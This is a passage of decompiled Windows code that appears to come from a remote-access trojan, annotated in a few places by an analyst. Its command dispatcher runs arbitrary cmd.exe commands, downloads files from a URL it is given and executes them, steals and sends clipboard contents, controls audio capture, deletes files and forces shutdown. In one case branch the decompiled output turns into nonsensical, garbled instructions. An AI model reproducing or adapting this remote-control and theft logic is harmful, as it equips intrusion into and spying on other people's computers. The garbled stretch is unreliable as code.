                                    								__ecx =  &_v420;
                                    								__esi = __eax;
                                    								__eax = L00401E49( &_v420, __edx, __eflags, 0);
                                    								__esp = __esp - 0x18;
                                    								__ecx =  &_v340;
                                    								__edi = __esp;
                                    								__edx = __esi;
                                    								__edx = E00417226(__ebx,  &_v340, __esi);
                                    								__ecx =  &_v372;
                                    								__edx = __eax;
                                    								__ecx = __edi;
                                    								__eax = L00402F93(__ebx, __edi, __edx, __eflags, __eax);
                                    								_push(0xab);
                                    								goto L119;
                                    							case 0xe:
                                    								__eflags =  *0x46bb03;                 // global "already started" flag
                                    								if( *0x46bb03 != 0) {
                                    									ShowWindow( *0x46bebc, 9) = SetForegroundWindow( *0x46bebc);   // 9 = SW_RESTORE on the window handle kept at 0x46bebc
                                    								} else {
                                    									__cl = 1;
                                    									__eax = L00418F59(__ebx, __ecx, __edx);
                                    									__ebx = 0;
                                    									__eax = CreateThread(0, 0,  &M00418D28, 0, 0, 0);   // worker thread for this feature; the sample does not keep the handle
                                    									 *0x46bb03 = 2;
                                    								}
                                    								goto L120;
                                    							case 0xf:
                                    								_push(5);
                                    								goto L16;
                                    							case 0x10:
                                    								__ebx = 0;
                                    								_push(0);
                                    								_push(0);
                                    								goto L17;
                                    							case 0x11:
                                    								__ecx =  &_v116;
                                    								__eax = E004072F6( &_v116);
                                    								__ecx =  &_v420;
                                    								__eax = L00401E49( &_v420, __edx, __eflags, 2);
                                    								__esp = __esp - 0x18;
                                    								__ecx = __esp;
                                    								__eax = E004020EC(__ebx, __esp, __edx, __eflags, __eax);
                                    								__ecx =  &_v428;
                                    								__eax = L00401E49( &_v428, __edx, __eflags, 1);
                                    								__esp = __esp - 0x18;
                                    								__ecx = __esp;
                                    								__eax = E004020EC(__ebx, __esp, __edx, __eflags, __eax);
                                    								__ecx =  &_v436;
                                    								__eax = L00401E49( &_v436, __edx, __eflags, 0);
                                    								__esp = __esp - 0x18;
                                    								__ecx = __esp;
                                    								__eax = E004020EC(__ebx, __esp, __edx, __eflags, __eax);
                                    								__ecx =  &_v140;
                                    								__eax = L00405BD3( &_v140, __edx);
                                    								__ecx =  &_v212;
                                    								__eax = L00407304(__ebx, __ecx, __esi);
                                    								goto L120;
                                    							case 0x12:
                                    								goto L120;
                                    						}
                                    					}
                                    					goto L120;
                                    				} else {
                                    					if(_t400 == 0) {
                                    						L124();
                                    						_v348 = L00436769(_t237, L00401F95(L00401E49( &_v420, _t360, __eflags, 2)));
                                    						_v344 =  &_v120;
                                    						L004139B3(__ebx, _t360, 0x46c238, __eflags,  &_v348);
                                    						_t120 = E0040805A() - 1; // -1
                                    						_t378 = _t120;
                                    						_t244 = L00401E49( &_v428, _t360, __eflags, 3);
                                    						_t394 = _t390 - 0x18;
                                    						E004020EC(_t294, _t394, _t360, __eflags, _t244);
                                    						_t246 = L00401E49( &_v436, _t360, __eflags, 2);
                                    						E004020EC(_t294, _t394 - 0x18, _t360, __eflags, _t246);
                                    						E0040427F(_t294, _t394, L00401F95(L00401E49( &_v444, _t360, __eflags, 1)));
                                    						E0040427F(_t294, _t394 - 0xffffffffffffffe8, L00401F95(L00401E49( &_v452, _t360, __eflags, 0)));
                                    						L004077EC( &_v156, _t360, __eflags);
                                    						__eflags = _v252;
                                    						if(_v252 == 0) {
                                    							E00408007( &_v420,  *((intOrPtr*)(L00407FE6(E0040806E( &_v156,  &_v504),  &_v500, _t378))));
                                    						}
                                    						L00407FDE(_t294,  &_v212, _t378);
                                    						goto L120;
                                    					} else {
                                    						_t379 = _t375 - 1;               // lower range: ids 1..0x34 via jump table M004133F5
                                    						if(_t379 > 0x33) {               // id 0 and ids 0x35..0x8f go straight to cleanup
                                    							L120:
                                    							_t163 =  &_v420; // 0x404538
                                    							L00401E74(_t163, _t360);
                                    							L00401FC7();
                                    							L00401FC7();
                                    							return 0;
                                    						} else {
                                    							switch( *((intOrPtr*)(_t379 * 4 +  &M004133F5))) {
                                    								case 0:
                                    									_t263 = E00417226(0,  &_v368, GetTickCount());
                                    									_t265 = E00417226(0,  &_v336, E004171D6( &_v368));
                                    									_t267 = E0041739C(0,  &_v164, E0041719C( &_v140));
                                    									_t369 = L00402F93(0,  &_v404, L00402F1D( &_v264, L00402F93(0,  &_v240, L00402F1D( &_v216, L00402FB7( &_v192, L00401E49( &_v420, _t266, _t401, 0), 0x46c238), _t267), _t401, 0x46c238), _t265), _t401, 0x46c238);
                                    									L00402F1D(_t390 - 0x18, _t273, _t263);
                                    									_push(0x4c);
                                    									L00404AA4(0, 0x46c780, _t273, _t401);
                                    									L00401FC7();
                                    									L00401FC7();
                                    									L00401FC7();
                                    									L00401FC7();
                                    									L00401FC7();
                                    									L00401FC7();
                                    									L00401EF0();
                                    									L00401FC7();
                                    									L00401FC7();
                                    									_t287 = L00436769(_t285, L00401F95(L00401E49( &_v452, _t273, _t401, 1)));
                                    									if(_t287 == 0) {
                                    										L00401E49( &_v440, _t369, __eflags, 0);
                                    										_t360 = "0";
                                    										_t289 = L00405A6F("0");
                                    										__eflags = _t289;
                                    										if(_t289 != 0) {
                                    											_push(0);
                                    											_t358 = 0x46c780;
                                    											goto L10;
                                    										}
                                    									} else {
                                    										_t360 = _t287 + _t287;
                                    										if(L0040484A(0x46c780) == 0) {
                                    											L00404E9A(0x46c780, _t360, 1);
                                    										} else {
                                    											L00404FAD(0x46c238, _t360);
                                    										}
                                    									}
                                    									goto L120;
                                    								case 1:
                                    									_push(0);
                                    									__ecx = 0x46c780;
                                    									L10:
                                    									E0040511B(_t358, 0x46c238);
                                    									goto L120;
                                    								case 2:
                                    									__ecx =  &_v368;
                                    									__eax = L00417C05(__ebx,  &_v368);
                                    									__esp = __esp - 0x18;
                                    									__edx = __eax;
                                    									__ecx = __esp;
                                    									__eax = E0041739C(__ebx, __esp, __edx);
                                    									_push(0x33);
                                    									__ecx = 0x46c780;
                                    									__eax = L00404AA4(__ebx, 0x46c780, __edx, __eflags);
                                    									__ecx =  &_v396;
                                    									goto L101;
                                    								case 3:
                                    									goto L120;
                                    								case 4:
                                    									 &_v376 = GetCurrentProcessId();
                                    									__eax = L0043BACE(__ecx, __eax,  &_v376, 0xa);   // integer-to-string, radix 10; the PID string is sent back with command 0x4f below via L00404AA4 (whose subcall issues send(), per the API list above)
                                    									__esp = __esp - 0xc;
                                    									__eax =  &_v376;
                                    									__esi = __esp;
                                    									__ecx =  &_v336;
                                    									__edx = E0040D211(__ebx,  &_v336, __eflags);
                                    									__ecx =  &_v368;
                                    									__edx = __eax;
                                    									__ecx = __esi;
                                    									__eax = E00405343(__ebx, __esi, __edx, __edi, __eflags,  &_v376);
                                    									_push(0x4f);
                                    									L119:
                                    									__ecx = 0x46c780;
                                    									__eax = L00404AA4(__ebx, 0x46c780, __edx, __eflags);
                                    									__ecx =  &_v396;
                                    									__eax = L00401FC7();
                                    									__ecx =  &_v364;
                                    									__eax = L00401FC7();
                                    									goto L120;
                                    								case 5:
                                    									__ecx =  &_v420;
                                    									__ecx = L00401E49( &_v420, __edx, __eflags, 0);
                                    									__eax = L00401F95(__ecx);
                                    									__ecx = __eax;
                                    									__eax = E004171F9(__ecx);
                                    									goto L120;
                                    								case 6:
                                    									L20:
                                    									__eax = L00413909(__edx);
                                    									goto L120;
                                    								case 7:
                                    									__ecx =  &_v420;
                                    									__ecx = L00401E49( &_v420, __edx, __eflags, 0);
                                    									__eax = L00401F95(__ecx);
                                    									__eax = CloseWindow(__eax);
                                    									goto L120;
                                    								case 8:
                                    									_push(3);
                                    									goto L16;
                                    								case 9:
                                    									_push(9);
                                    									L16:
                                    									_push(0);
                                    									L17:
                                    									__ecx =  &_v420;
                                    									__ecx = L00401E49( &_v420, __edx, __eflags);
                                    									__eax = L00401F95(__ecx);
                                    									__eax = ShowWindow(__eax, ??);
                                    									goto L120;
                                    								case 0xa:
                                    									__eax =  &_v372;
                                    									__ecx =  &_v420;
                                    									__ecx = L00401E49( &_v420, __edx, __eflags, 0);
                                    									__eax = L00401F95(__ecx);
                                    									__eax = GetWindowThreadProcessId(__eax,  &_v372);
                                    									__ecx = _v376;
                                    									__eax = E004171F9(_v376);
                                    									goto L20;
                                    								case 0xb:
                                    									__ebx = 0;
                                    									__ecx =  &_v420;
                                    									__ecx = L00401E49( &_v420, __edx, __eflags, 0);
                                    									__eax = L00401F95(__eax);
                                    									__ecx =  &_v340;
                                    									__eax = E0040427F(0,  &_v340, __eax);
                                    									__edx = L"/C ";
                                    									__ecx =  &_v376;
                                    									__ecx = __eax;
                                    									__eax = ShellExecuteW(0, L"open", L"cmd.exe", __eax, 0, 0);
                                    									__ecx =  &_v376;
                                    									__eax = L00401EF0();
                                    									__ecx =  &_v344;
                                    									goto L101;
                                    								case 0xc:
                                    									__ecx =  &_v420;
                                    									__eax = L00401E49( &_v420, __edx, __eflags, 1);
                                    									__ecx = 0x46c2d0;
                                    									__eax = L00401FAD(0x46c2d0, __eax);
                                    									__eflags =  *0x46bae3 - __bl;
                                    									if(__eflags == 0) {
                                    										__ecx =  &_v420;
                                    										__eax = L00401E49( &_v420, __edx, __eflags, 0);
                                    										__esp = __esp - 0x18;
                                    										__ecx = __esp;
                                    										__eax = L004055EA();
                                    										goto L97;
                                    									}
                                    									goto L120;
                                    								case 0xd:
                                    									__ebx = 0;
                                    									__ecx =  &_v420;
                                    									__ecx = L00401E49( &_v420, __edx, __eflags, 0);
                                    									L00401F95(__ecx) = ShellExecuteW(0, L"open", __eax, 0, 0, 1);
                                    									goto L120;
                                    								case 0xe:
                                    									__ecx =  &_v420;
                                    									__eax = L00401E49( &_v420, __edx, __eflags, 0);
                                    									__ecx = 0x46c868;
                                    									__eax = L00401FAD(0x46c868, __eax);
                                    									__ecx =  &_v428;
                                    									__ecx = L00401E49( &_v428, __edx, __eflags, 3);
                                    									__eax = L00401F95(__ecx);
                                    									__esi = __eax;
                                    									__eax = L0041451F(__edx, __edi, __eax);
                                    									__ecx =  &_v432;
                                    									__ecx = L00401E49( &_v432, __edx, __eflags, 2);
                                    									__eax = L00401F95(__ecx);
                                    									__eax = L00436769(__ecx, __eax);
                                    									__eflags = __eax;
                                    									__ecx =  &_v436;
                                    									_t57 = __eax != 0;
                                    									__eflags = _t57;
                                    									__ebx = 0 | _t57;
                                    									__ecx = L00401E49( &_v436, __edx, _t57, 1);
                                    									L00401F95(__ecx) = L00436769(__ecx, __eax);
                                    									__dl = __bl;
                                    									__cl = __al;
                                    									__eax = L0041459C(__ecx, __edx, __eflags, __esi);
                                    									goto L26;
                                    								case 0xf:
                                    									 *0x46bd6a = 1;
                                    									goto L120;
                                    								case 0x10:
                                    									__ecx =  &_v420;
                                    									__eax = L00401E49( &_v420, __edx, __eflags, 0);
                                    									__esp = __esp - 0x18;
                                    									__ecx = __esp;
                                    									__eax = E004020EC(__ebx, __esp, __edx, __eflags, __eax);
                                    									__ecx = 0x46c350;
                                    									__eax = E0040857D(0x46c350, __edx);
                                    									goto L120;
                                    								case 0x11:
                                    									__ecx = 0x46c350;
                                    									__eax = E004093AD(0x46c350);
                                    									goto L120;
                                    								case 0x12:
                                    									__ecx = 0x46c350;
                                    									__eax = L0040951E(__ebx, 0x46c350);
                                    									goto L120;
                                    								case 0x13:
                                    									__ecx =  &_v420;
                                    									__eax = L00401E49( &_v420, __edx, __eflags, 0);
                                    									__ecx = 0x46c3e0;
                                    									__eax = L00401FAD(0x46c3e0, __eax);
                                    									__ecx = 0x46c350;
                                    									goto L32;
                                    								case 0x14:
                                    									 *0x46bd6c =  *0x46bd6c + 1;
                                    									__eflags =  *0x46bd6c;
                                    									__ecx =  &_v420;
                                    									__eax = L00401E49( &_v420, __edx, __eflags, 0);
                                    									__esp = __esp - 0x18;
                                    									__ecx = __esp;
                                    									__eax = E004020EC(__ebx, __esp, __edx, __eflags, __eax);
                                    									__ecx = 0x46c350;
                                    									__eax = L00408FF0(0x46c350, __edx);
                                    									goto L34;
                                    								case 0x15:
                                    									__esi = 0x46c350;
                                    									__ecx = 0x46c350;
                                    									__eax = L00409D36(0x46c350);
                                    									__ecx = 0x46c350;
                                    									L32:
                                    									__eax = L00408E9E(__ebx, __ecx);
                                    									goto L120;
                                    								case 0x16:
                                    									__eflags =  *0x46baf9 - __bl;
                                    									if( *0x46baf9 == __bl) {
                                    										__edx = 0;
                                    										__cl = 0;
                                    										__eax = L0040A679(0);
                                    									}
                                    									goto L120;
                                    								case 0x17:
                                    									__ebx = 0;
                                    									__ecx =  &_v420;
                                    									__eax = L00401E49( &_v420, __edx, __eflags, 0);
                                    									__ecx = 0x46c1b8;
                                    									__eax = L00401FAD(0x46c1b8, __eax);
                                    									__ecx = 0x46c1d0;
                                    									__eax = E0040498B(0x46c1d0);
                                    									__esp = __esp - 0x10;
                                    									__esi = 0x46bacc;
                                    									__edi = __esp;
                                    									asm("movsd");
                                    									asm("movsd");
                                    									asm("movsd");
                                    									asm("movsd");
                                    									__esi = 0x46c1d0;
                                    									__ecx = 0x46c1d0;
                                    									__eax = E00404A08(__edx);
                                    									__esp = __esp - 0x18;
                                    									__ecx = __esp;
                                    									_push(0x46c1b8);
                                    									__eflags =  *0x46baaa - __bl;
                                    									if(__eflags == 0) {
                                    										__eax = E004020EC(0, __ecx, __edx, __eflags);
                                    									} else {
                                    										__eax = E004020EC(0, __ecx, __edx, __eflags);
                                    									}
                                    									__ecx = __esi;
                                    									__eax = L00404AA4(__ebx, __esi, __edx, __eflags);
                                    									__ecx = __esi;
                                    									__eax = L00404BBE(__ecx, __edx, 0x404538, __ebx);
                                    									goto L120;
                                    								case 0x18:
                                    									__eax =  *0x46bac0();
                                    									__ecx = 0x46c1d0;
                                    									__eax = L00404E0B(0x46c1d0);
                                    									goto L120;
                                    								case 0x19:
                                    									__ebx = 0;
                                    									__ecx =  &_v420;
                                    									 *0x46ba74 = __bl;
                                    									__eax = L00401E49( &_v420, __edx, __eflags, 3);
                                    									__esp = __esp - 0x18;
                                    									__ecx = __esp;
                                    									__eax = E004020EC(0, __esp, __edx, __eflags, __eax);
                                    									__ecx =  &_v428;
                                    									__ecx = L00401E49( &_v428, __edx, __eflags, 2);
                                    									__eax = L00401F95(__ecx);
                                    									_push(__eax);
                                    									__ecx =  &_v432;
                                    									__ecx = L00401E49( &_v432, __edx, __eflags, 1);
                                    									__eax = L00401F95(__ecx);
                                    									__eax = L00436769(__ecx, __eax);
                                    									__ecx =  &_v436;
                                    									__esi = __eax;
                                    									__ecx = L00401E49( &_v436, __edx, __eflags, 0);
                                    									__eax = L00401F95(__ecx);
                                    									__eax = L00436769(__ecx, __eax);
                                    									__edx = __esi;
                                    									__ecx = __eax;
                                    									__eax = L004016F8(__ecx, __edx, __edi, __esi);
                                    									goto L120;
                                    								case 0x1a:
                                    									 *0x46ba74 = 1;
                                    									waveInStop( *0x46bab8) = waveInClose( *0x46bab8);
                                    									goto L120;
                                    								case 0x1b:
                                    									 *0x46bd6c =  *0x46bd6c + 1;
                                    									__ecx =  &_v420;
                                    									__eax = L00401E49( &_v420, __edx, __eflags, 1);
                                    									__esp = __esp - 0x18;
                                    									__ecx = __esp;
                                    									__eax = E004020EC(__ebx, __esp, __edx, __eflags, __eax);
                                    									__ecx =  &_v428;
                                    									__eax = L00401E49( &_v428, __edx, __eflags, 0);
                                    									__esp = __esp - 0x18;
                                    									__ecx = __esp;
                                    									__eax = E00410188(__edx);
                                    									__esp = __esp + 0x30;
                                    									L34:
                                    									 *0x46bd6c =  *0x46bd6c - 1;
                                    									goto L120;
                                    								case 0x1c:
                                    									__ecx =  &_v420;
                                    									__ecx = L00401E49( &_v420, __edx, __eflags, 0);
                                    									L00401F95(__ecx) = DeleteFileW(__eax);
                                    									goto L120;
                                    								case 0x1d:
                                    									__eax = E0041015B();
                                    									ExitProcess(0);
                                    									goto L46;
                                    								case 0x1e:
                                    									L47:
                                    									__eflags =  *0x46bd6c - __ebx;
                                    									if( *0x46bd6c != __ebx) {
                                    										L46:
                                    										Sleep(0x64);
                                    										goto L47;
                                    									}
                                    									__eax = L0040AD84();
                                    									_pop(__ebx);
                                    									__al = __al & 0x00000041;
                                    									__cl = __cl + __ah;
                                    									__eax = __eax & 0x2f500041;
                                    									__ecx = __ecx + 1;
                                    									__ah = __ah + __al;
                                    									__eax = __eax ^  *__ecx;
                                    									asm("les esi, [ebx]");
                                    									__ecx = __ecx + 1;
                                    									__dl = __dl + __ch;
                                    									__eax = __eax & 0x262e0041;
                                    									__ecx = __ecx + 1;
                                    									__cl = __cl + __dl;
                                    									__ecx = __ecx + 1;
                                    									 *((intOrPtr*)(__ebx + 0x26)) =  *((intOrPtr*)(__ebx + 0x26)) + __dl;
                                    									__ecx = __ecx + 1;
                                    									 *((intOrPtr*)(__eax + 0x26)) =  *((intOrPtr*)(__eax + 0x26)) + __bh;
                                    									__ecx = __ecx + 1;
                                    									 *((intOrPtr*)(__edi - 0x5cffbeda)) =  *((intOrPtr*)(__edi - 0x5cffbeda)) + __bl;
                                    									__ecx = __ecx + 1;
                                    									__bl = __bl + __bl;
                                    									__ecx = __ecx + 1;
                                    									 *0x77004127 =  *0x77004127 + __dh;
                                    									asm("daa");
                                    									__ecx = __ecx + 1;
                                    									 *((intOrPtr*)(__eax + 0x1d004127)) =  *((intOrPtr*)(__eax + 0x1d004127)) + __ah;
                                    									 *__ecx =  *__ecx - __al;
                                    									 *__eax =  *__eax - __ebp;
                                    									__ecx = __ecx + 1;
                                    									 *((intOrPtr*)(__esi + 0x28)) =  *((intOrPtr*)(__esi + 0x28)) + __cl;
                                    									__ecx = __ecx + 1;
                                    									_a36 = _a36 + __bl;
                                    									__ecx = __ecx + 1;
                                    									 *((intOrPtr*)(__eax +  &_a61)) =  *((intOrPtr*)(__eax +  &_a61)) + __ch;
                                    									 *((intOrPtr*)(__ecx - 0x3dffbed8)) =  *((intOrPtr*)(__ecx - 0x3dffbed8)) + __dl;
                                    									 *__ecx =  *__ecx - __al;
                                    									0x4133();
                                    									__ah = __ah + __al;
                                    									__eax = __eax ^  *__ecx;
                                    									 *__eax =  *__eax >> __cl;
                                    									__ecx = __ecx + 1;
                                    									 *((intOrPtr*)(__eax + 0x29)) =  *((intOrPtr*)(__eax + 0x29)) + __cl;
                                    									__ecx = __ecx + 1;
                                    									_a37 = _a37 + __bl;
                                    									__ecx = __ecx + 1;
                                    									__cl = __cl + __bl;
                                    									 *__ecx =  *__ecx - __eax;
                                    									asm("std");
                                    									 *__ecx =  *__ecx - __eax;
                                    									__eflags = __al - 0x2a;
                                    									__ecx = __ecx + 1;
                                    									 *((intOrPtr*)(__edx + 0x2a)) =  *((intOrPtr*)(__edx + 0x2a)) + __bl;
                                    									__ecx = __ecx + 1;
                                    									 *((intOrPtr*)(__edi + 0x2a)) =  *((intOrPtr*)(__edi + 0x2a)) + __ch;
                                    									__ecx = __ecx + 1;
                                    									 *((intOrPtr*)(__edx +  &_a61)) =  *((intOrPtr*)(__edx +  &_a61)) + __bh;
                                    									 *((intOrPtr*)(__esi + 0x1c00412a)) =  *((intOrPtr*)(__esi + 0x1c00412a)) + __cl;
                                    									__eax = __eax -  *__ecx;
                                    									asm("invalid");
                                    									__ecx = __ecx + 1;
                                    									__cl = __cl + __ah;
                                    									__eax = __eax -  *__ecx;
                                    									 *0x2cee0041 = __ch;
                                    									__ecx = __ecx + 1;
                                    									_a41 = _a41 + __ch;
                                    									__ecx = __ecx + 1;
                                    									__dl = __dl + __ch;
                                    									__eax = __eax - 0x2e1e0041;
                                    									__ecx = __ecx + 1;
                                    									 *((intOrPtr*)(__esi + 0x2e)) =  *((intOrPtr*)(__esi + 0x2e)) + __ch;
                                    									__ecx = __ecx + 1;
                                    									 *((intOrPtr*)(__eax + 0x2e)) =  *((intOrPtr*)(__eax + 0x2e)) + __bh;
                                    									__ecx = __ecx + 1;
                                    									 *((intOrPtr*)(__eax - 0x47ffbed2)) =  *((intOrPtr*)(__eax - 0x47ffbed2)) + __bl;
                                    									__ecx = __ecx + 1;
                                    									__al = __al + __bl;
                                    									__ecx = __ecx + 1;
                                    									 *__eax =  *__eax + __dh;
                                    									asm("das");
                                    									__ecx = __ecx + 1;
                                    									__ah = __ah + __al;
                                    									__eax = __eax ^  *__ecx;
                                    									__eflags = __eax;
                                    									if(__eax == 0) {
                                    										__ecx = __ecx + 1;
                                    										__ch = __ch + __ch;
                                    										 *__ecx =  *__ecx ^ __al;
                                    										asm("adc dh, [ecx]");
                                    										__ecx = __ecx + 1;
                                    										 *__edx =  *__edx + __dl;
                                    										__al = __al ^  *__ecx;
                                    										__dh =  *__edx;
                                    										__ecx = __ecx + 1;
                                    										 *((intOrPtr*)(__edx - 0x35ffbece)) =  *((intOrPtr*)(__edx - 0x35ffbece)) + __ch;
                                    										 *__ecx =  *__ecx ^ __al;
                                    										__edx = __edx - 1;
                                    										__al = __al ^  *__ecx;
                                    										_push(0x32);
                                    										__ecx = __ecx + 1;
                                    										 *((intOrPtr*)(__eax + 0x33)) =  *((intOrPtr*)(__eax + 0x33)) + __dl;
                                    										__ecx = __ecx + 1;
                                    										 *((intOrPtr*)(__edi + 0x33)) =  *((intOrPtr*)(__edi + 0x33)) + __dl;
                                    										__ecx = __ecx + 1;
                                    										 *((intOrPtr*)(__esi + 0x33)) =  *((intOrPtr*)(__esi + 0x33)) + __bl;
                                    										__ecx = __ecx + 1;
                                    										 *__ecx =  *__ecx + __ah;
                                    										__eflags =  *__ecx;
                                    									}
                                    									__eax = __eax ^  *__ecx;
                                    									asm("retf 0x4132");
                                    									_a47 = _a47 + __ah;
                                    									__ecx = __ecx + 1;
                                    									__ah = __ah + __dl;
                                    									__al = __al ^  *__ecx;
                                    									__dh = __dh +  *__edx;
                                    									__ecx = __ecx + 1;
                                    									 *__ecx =  *__ecx + __cl;
                                    									__al = __al ^  *__ecx;
                                    									_t216 = __eax;
                                    									__eax = __edi;
                                    									__edi = _t216;
                                    									 *__ecx =  *__ecx ^ __eax;
                                    									asm("les esi, [ebx]");
                                    									__ecx = __ecx + 1;
                                    									 *__eax =  *__eax + __al;
                                    									asm("adc al, [ecx]");
                                    									asm("adc al, [edx]");
                                    									__edx = __edx +  *__edx;
                                    									__al = __al + 5;
                                    									_push(es);
                                    									_pop(es);
                                    									asm("adc dl, [edx]");
                                    									asm("adc cl, [eax]");
                                    									 *__edx =  *__edx | __ecx;
                                    									asm("adc cl, [ebx]");
                                    									__al = __al | 0x00000012;
                                    									asm("adc dl, [edx]");
                                    									asm("adc dl, [edx]");
                                    									asm("adc dl, [edx]");
                                    									__eax = __eax | 0x12100f0e;
                                    									asm("adc dl, [edx]");
                                    									asm("adc [esi-0x75], edx");
                                    									_push(__esi);
                                    									__esi = __ecx;
                                    									__ecx = __esi + 4;
                                    									L0040484E(__ebx, __esi + 4, 0) = __esi;
                                    									_pop(__esi);
                                    									return __esi;
                                    									goto L125;
                                    								case 0x1f:
                                    									__eax = E0040B488(__ebx, __eflags);
                                    									goto L120;
                                    								case 0x20:
                                    									while(1) {
                                    										__eflags =  *0x46bd6c - __ebx;
                                    										if(__eflags == 0) {
                                    											break;
                                    										}
                                    										Sleep(0x64);
                                    									}
                                    									__ebx = 0;
                                    									__ecx =  &_v420;
                                    									__ecx = L00401E49( &_v420, __edx, __eflags, 0);
                                    									__eax = L00401F95(__eax);
                                    									__ecx =  &_v424;
                                    									__esi = __eax;
                                    									__ecx = L00401E49( &_v424, __edx, __eflags, 1);
                                    									__eax = L00401F95(__eax);
                                    									__dl =  *__esi;
                                    									__ecx =  &_v408;
                                    									__eax = E0041805B( &_v408, __edx, __eax);
                                    									_push(0);
                                    									_push(0);
                                    									__ecx =  &_v408;
                                    									_push(L00401EEB( &_v408));
                                    									__ecx =  &_v428;
                                    									__ecx = L00401E49( &_v428, __edx, __eflags, 2);
                                    									__eax = L00401F95(__eax);
                                    									_push(__eax);
                                    									_push(0);
                                    									__imp__URLDownloadToFileW();
                                    									__eflags = __eax;
                                    									if(__eflags == 0) {
                                    										goto L53;
                                    									}
                                    									goto L100;
                                    								case 0x21:
                                    									while(1) {
                                    										__eflags =  *0x46bd6c - __ebx;
                                    										if(__eflags == 0) {
                                    											break;
                                    										}
                                    										Sleep(0x64);
                                    									}
                                    									__ecx =  &_v420;
                                    									__ecx = L00401E49( &_v420, __edx, __eflags, 0);
                                    									__eax = L00401F95(__eax);
                                    									__ecx =  &_v424;
                                    									__esi = __eax;
                                    									__ecx = L00401E49( &_v424, __edx, __eflags, 1);
                                    									__eax = L00401F95(__eax);
                                    									__dl =  *__esi;
                                    									__ecx =  &_v408;
                                    									__eax = E0041805B( &_v408, __edx, __eax);
                                    									__ecx =  &_v408;
                                    									__eax = L00401EEB( &_v408);
                                    									__ecx =  &_v428;
                                    									__esi = __eax;
                                    									__eax = L00401E49( &_v428, __edx, __eflags, 2);
                                    									__esp = __esp - 0x18;
                                    									__ecx = __esp;
                                    									__eax = E004020EC(__ebx, __esp, __edx, __eflags, __eax);
                                    									__ecx = __esi;
                                    									__eax = L00417A4E(__esi);
                                    									__esp = __esp + 0x18;
                                    									__eflags = __al;
                                    									if(__eflags != 0) {
                                    										L53:
                                    										__esp = __esp - 0x18;
                                    										__eax =  &_v420;
                                    										__ecx = __esp;
                                    										E00407350(__ebx, __esp, __edx, __eflags,  &_v420) = E0040B0E2();
                                    										__esp = __esp + 0x18;
                                    									}
                                    									goto L100;
                                    								case 0x22:
                                    									__ecx =  &_v420;
                                    									__ecx = L00401E49( &_v420, __edx, __eflags, 2);
                                    									__eax = L00401F95(__ecx);
                                    									__eax = __eax + 0x10000;
                                    									__ecx =  &_v424;
                                    									__ecx = L00401E49( &_v424, __edx, __eflags, 1);
                                    									__eax = L00401F95(__eax);
                                    									__ebx = 0;
                                    									__ecx =  &_v428;
                                    									__ecx = L00401E49( &_v428, __edx, __eflags, 0);
                                    									L00401F95(__ecx) = MessageBoxW(0, __eax, __eax, __eax);
                                    									goto L120;
                                    								case 0x23:
                                    									__eax = L00413958();
                                    									__ebx = 0;
                                    									__ecx =  &_v420;
                                    									__eax = L00401E49( &_v420, __edx, __eflags, 0);
                                    									__edx = "0";
                                    									__ecx = __eax;
                                    									__eax = L00405A6F(__edx);
                                    									__ecx =  &_v424;
                                    									_push(0);
                                    									__eflags = __al;
                                    									if(__eflags == 0) {
                                    										__eax = L00401E49( &_v424, __edx, __eflags);
                                    										__edx = "1";
                                    										__ecx = __eax;
                                    										__eax = L00405A6F(__edx);
                                    										__ecx =  &_v424;
                                    										_push(0);
                                    										__eflags = __al;
                                    										if(__eflags == 0) {
                                    											__eax = L00401E49( &_v424, __edx, __eflags);
                                    											__edx = "2";
                                    											__ecx = __eax;
                                    											__eax = L00405A6F(__edx);
                                    											__eflags = __al;
                                    											if(__eflags == 0) {
                                    												__eax = LoadLibraryA("PowrProf.dll");
                                    												__eax = GetProcAddress(__eax, "SetSuspendState");
                                    												__ecx =  &_v420;
                                    												__esi = __eax;
                                    												__eax = L00401E49( &_v420, __edx, __eflags, 0);
                                    												__edx = "3";
                                    												__ecx = __eax;
                                    												__eax = L00405A6F(__edx);
                                    												_push(0);
                                    												__eflags = __al;
                                    												if(__eflags == 0) {
                                    													__ecx =  &_v420;
                                    													__eax = L00401E49( &_v420, __edx, __eflags);
                                    													__edx = "4";
                                    													__ecx = __eax;
                                    													__eax = L00405A6F(__edx);
                                    													__eflags = __al;
                                    													if(__al != 0) {
                                    														_push(0);
                                    														_push(0);
                                    														_push(1);
                                    														goto L70;
                                    													}
                                    												} else {
                                    													_push(0);
                                    													_push(0);
                                    													L70:
                                    													__eax =  *__esi();
                                    												}
                                    											} else {
                                    												_push(0);
                                    												__ecx =  &_v420;
                                    												__ecx = L00401E49( &_v420, __edx, __eflags, 1);
                                    												__eax = L00401F95(__ecx);
                                    												__eax = L00436769(__ecx, __eax);
                                    												__eax = __eax | 0x00000002;
                                    												__eflags = __eax;
                                    												goto L65;
                                    											}
                                    										} else {
                                    											__ecx = L00401E49( &_v424, __edx, __eflags, 1);
                                    											__eax = L00401F95(__ecx);
                                    											__eax = L00436769(__ecx, __eax);
                                    											__eax = __eax | 0x00000001;
                                    											goto L65;
                                    										}
                                    									} else {
                                    										__ecx = L00401E49( &_v424, __edx, __eflags, 1);
                                    										__eax = L00401F95(__ecx);
                                    										__eax = L00436769(__ecx, __eax);
                                    										L65:
                                    										_pop(__ecx);
                                    										__eax = ExitWindowsEx(__eax, ??);
                                    									}
                                    									goto L120;
                                    								case 0x24:
                                    									L76:
                                    									__eax = OpenClipboard(__ebx);
                                    									__eflags = __eax;
                                    									if(__eax != 0) {
                                    										__esi = GetClipboardData(0xd);
                                    										__edi = GlobalLock(__esi);
                                    										GlobalUnlock(__esi) = CloseClipboard();
                                    										__eflags = __edi;
                                    										0x45f724 =  !=  ? __edi : 0x45f724;
                                    										__ecx =  &_v400;
                                    										__eax = E0040427F(__ebx,  &_v400,  !=  ? __edi : 0x45f724);
                                    										__esp = __esp - 0x18;
                                    										__edx =  &_v404;
                                    										__ecx = __esp;
                                    										__eax = E0041739C(__ebx, __esp, __edx);
                                    										_push(0x6b);
                                    										__ecx = 0x46c780;
                                    										__eax = L00404AA4(__ebx, 0x46c780, __edx, __eflags);
                                    										L100:
                                    										__ecx =  &_v400;
                                    										L101:
                                    										__eax = L00401EF0();
                                    									}
                                    									goto L120;
                                    								case 0x25:
                                    									__eflags = OpenClipboard(0);
                                    									if(__eflags != 0) {
                                    										__eax = EmptyClipboard();
                                    										__ecx =  &_v420;
                                    										__ecx = L00401E49( &_v420, __edx, __eflags, 0);
                                    										__eax = E00402489();
                                    										__eax = __eax + 2;
                                    										__edi = __eax;
                                    										__eax = GlobalLock(__edi);
                                    										__ecx =  &_v424;
                                    										__esi = __eax;
